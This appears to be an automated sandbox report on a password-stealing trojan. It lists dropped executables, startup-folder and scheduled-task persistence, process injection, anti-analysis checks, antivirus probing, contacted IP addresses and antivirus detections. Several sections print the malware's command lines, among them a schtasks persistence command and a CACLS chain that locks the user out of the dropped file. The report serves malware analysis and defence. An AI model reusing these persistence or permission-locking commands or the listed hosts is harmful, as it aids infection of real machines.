DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6f12540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6f1252ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6f200ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 64871344 registers.edi: 1974991376 registers.eax: 64871344 registers.ebp: 64871424 registers.edx: 1 registers.ebx: 9031580 registers.esi: 2147746133 registers.ecx: 1925805225	1	0	0

Application Crash

Process iexplore.exe with pid 2148 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 19, 2023, 7:49 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 96335116
registers.edi: 8775908
registers.eax: 96335116
registers.ebp: 96335196
registers.edx: 618
registers.ebx: 96335480
registers.esi: 2147746133
registers.ecx: 81507464

__exception__

Oct. 19, 2023, 7:49 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6f12540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6f1252ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6f200ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 64871344
registers.edi: 1974991376
registers.eax: 64871344
registers.ebp: 64871424
registers.edx: 1
registers.ebx: 9031580
registers.esi: 2147746133
registers.ecx: 1925805225

Creates executable files on the filesystem (32 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wjix28kKarinpgjAYr9zDmpj.bat
file	C:\Users\test22\AppData\Local\40VNMGBt49jJ8V6q7umTXrGg.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SaAj8ddbQ8wkYIxlMtU24PeF.bat
file	C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
file	C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esNy7rk0zmYx5Vbij5LA4Nl6.bat
file	C:\Users\test22\Pictures\Opera_installer_2310190227557342164.dll
file	C:\Users\test22\AppData\Local\SzrkbvqI3iFiEux3stVgjl0M.exe
file	C:\Users\test22\AppData\Local\NbPpc3pDAZzoBkBuL7TzDyCB.exe
file	C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\hime.bat
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\himeffectively.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KkUIGNWOEZ7SF0rQw5yOyBqw.bat
file	C:\Users\test22\AppData\Local\97bebconSjePqzu2Nd0t5L6F.exe
file	C:\Users\test22\AppData\Local\Iq88uLPVUOWqnumlAHokPFqD.exe
file	C:\Users\test22\AppData\Local\c7Faqutu18vIy1LPj9FdgPAf.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ny6g2bRbZ1WF9N4OGUF7Y267.bat
file	C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
file	C:\Users\test22\AppData\Local\Temp\Opera_installer_2310190227556712164.dll
file	C:\Users\test22\AppData\Local\qFAU3pIQGQ63Dq6IbWwB1ZkI.exe
file	C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
file	C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\seatdesigner.exe
file	C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
file	C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
file	C:\Users\test22\AppData\Local\JsmUdKHC65rMj8moaXLLvvsH.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6p1uypRGfTUYYgl5UZ64RlVm.bat
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\untilmathematicspro.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematiics.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hjWYWkkCY8Nyq0IVvM6rdei6.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKmS6R2JXaTleGwL2IM1fGi1.bat

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\untilmathematics.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\seatdesigner.exe
file	C:\Users\test22\AppData\Local\SzrkbvqI3iFiEux3stVgjl0M.exe

A process created a hidden window (11 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe parameters: filepath: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe parameters: filepath: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe parameters: filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe parameters: filepath: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe parameters: filepath: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe parameters: filepath: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe parameters: filepath: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe parameters: --silent --allusers=0 filepath: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Oct. 19, 2023, 7:47 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit filepath: cmd	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 19, 2023, 7:48 a.m.	process_identifier: 2844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x051f0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 19, 2023, 7:47 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process installutil.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Oct. 19, 2023, 7:47 a.m.	buffer: HTTP/1.1 200 OK Date: Wed, 18 Oct 2023 22:53:55 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 18 Oct 2023 11:43:05 GMT ETag: "5e000-607fc247c97bc" Accept-Ranges: bytes Content-Length: 385024 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ '8dþIkdþIkdþIk/LjeþIk/JjgþIk/MjwþIk/HjuþIkdþHkÄþIk/AjnþIk/¶keþIk/KjeþIkRichdþIkPEd_ÔÙð"PP@ ð'(`Á £´ðåàDà0xT@P .text°~ `.rdata $0@@.dataÀÀ@À.pdataDàÐ@@.rsrcåððà@@.reloc0àÐ@B received: 2920 socket: 1544	1	2920	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00116200', u'virtual_address': u'0x0030f000', u'entropy': 7.999598195528803, u'name': u'UPX1', u'virtual_size': u'0x00117000'}

entropy

7.99959819553

description

A section with a high entropy has been found

entropy

0.999101930849

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation

Yara rule detected in process memory (22 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

The executable is compressed using UPX (3 events)

section	UPX0	description	Section name indicates UPX
section	UPX1	description	Section name indicates UPX
section	UPX2	description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2148 CREDAT:145409
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

Communicates with host for which no DNS query was performed (5 events)

host	104.194.128.170
host	117.18.232.200
host	172.86.97.117
host	193.42.32.29
host	85.217.144.143

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000000e8	1	0	0
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 3060 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Oct. 19, 2023, 7:47 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	untilmathematics.exe tried to sleep 2728163 seconds, actually delayed analysis time by 2728163 seconds
description	nhdues.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds

Installs itself for autorun at Windows startup (13 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wjix28kKarinpgjAYr9zDmpj.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hjWYWkkCY8Nyq0IVvM6rdei6.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6p1uypRGfTUYYgl5UZ64RlVm.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SaAj8ddbQ8wkYIxlMtU24PeF.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ny6g2bRbZ1WF9N4OGUF7Y267.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KkUIGNWOEZ7SF0rQw5yOyBqw.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKmS6R2JXaTleGwL2IM1fGi1.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esNy7rk0zmYx5Vbij5LA4Nl6.bat
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Oct. 19, 2023, 7:47 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Oct. 19, 2023, 7:47 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Drops a binary and executes it (6 events)

file	C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe
file	C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe
file	C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe
file	C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe
file	C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe
file	C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 19, 2023, 7:47 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3060 process_handle: 0x0000009c	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	nhdues.exe				useragent
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2456 called NtSetContextThread to modify thread in remote process 3060
NtSetContextThread Oct. 19, 2023, 7:47 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4206040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 3060	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 840 resumed a thread in remote process 2060
Process injection	Process 2456 resumed a thread in remote process 3060
Process injection	Process 2148 resumed a thread in remote process 2844
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000000000000e4 suspend_count: 1 process_identifier: 2060	1	0	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 3060	1	0	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 2844	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	cmd /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline	CACLS "..\1ff8bec27e" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline	CACLS "..\1ff8bec27e" /P "test22:R" /E
cmdline	CACLS "nhdues.exe" /P "test22:R" /E
cmdline	CACLS "nhdues.exe" /P "test22:N"

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Bkav	W64.AIDetectMalware
DrWeb	Trojan.DownLoader46.24761
Skyhigh	Artemis!Trojan
McAfee	Artemis!191FEBED315D
Cybereason	malicious.123f58
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/GenKryptik.GPCL
APEX	Malicious
Kaspersky	UDS:Trojan-PSW.Win32.Stealerc.fom
Avast	PWSX-gen [Trj]
Rising	Trojan.Kryptik!8.8 (TFE:5:75OIvYcHgzD)
Trapmine	suspicious.low.ml.score
Sophos	Mal/Generic-S
Webroot	W32.Trojan.Gen
Avira	TR/AD.Nekark.htohz
Gridinsoft	Ransom.Win64.Sabsik.sa
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	VHO:Trojan-PSW.Win32.Stealerc.gen
Cylance	unsafe
Panda	Trj/Chgt.AD
Fortinet	W64/GenKryptik.GMLD!tr
AVG	PWSX-gen [Trj]
DeepInstinct	MALICIOUS

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

193.42.32.29:80

Executed a process and injected code into it, probably while unpacking (50 out of 88 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000000000000b0 suspend_count: 1 process_identifier: 840	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000000000000cc suspend_count: 1 process_identifier: 840	1	0
